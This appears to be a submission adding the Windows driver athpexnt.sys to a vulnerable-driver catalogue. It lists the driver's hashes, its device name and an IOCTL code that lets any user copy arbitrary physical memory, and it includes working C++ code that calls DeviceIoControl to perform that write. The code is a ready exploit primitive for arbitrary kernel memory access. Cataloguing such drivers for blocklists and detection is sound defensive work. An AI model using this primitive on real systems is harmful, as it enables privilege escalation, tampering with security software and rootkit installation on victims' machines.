Add vulnerable driver athpexnt.sys #255
Description
Driver name: athpexnt.sys
Device name: \\.\ATHpEx
SHA256: fa0902daefbd9e716faaac8e854144ea0573e2a41192796f3b3138fe7a1d19f1
MD5: bf77a19e1396d6d36e32ff8d23eb5d3f
Allows for any user using IOCTL to input a source virtual address, dest virtual address and size, addresses are then translated and physical memory is copied.
Vulnerable function IOCTL Code: 0x81000000
Example usage:
class MemoryWriteIoctlPacket
{
private:
std::uint64_t Destination;
std::uint64_t Source;
std::uint32_t Size;
public:
MemoryWriteIoctlPacket(const std::uint64_t Dest, const std::uint64_t Src, const std::uint32_t Size)
: Destination(Dest), Source(Src), Size(Size) { }
};
bool Driver::Athpexnt::WritePhysicalMemory(const void* To, const void* From, const std::uint32_t Size) const
{
const MemoryWriteIoctlPacket IoctlPacketData(
reinterpret_cast<std::uint64_t>(To),
reinterpret_cast<std::uint64_t>(From),
Size
);
std::uint32_t BytesReturned = 0;
if (!DeviceIoControl(this->DriverHandle,
0x81000000,
const_cast<LPVOID>(reinterpret_cast<const void*>(&IoctlPacketData)),
sizeof(MemoryWriteIoctlPacket),
nullptr,
NULL,
reinterpret_cast<LPDWORD>(&BytesReturned),
NULL
))
{
return false;
}
return true;
}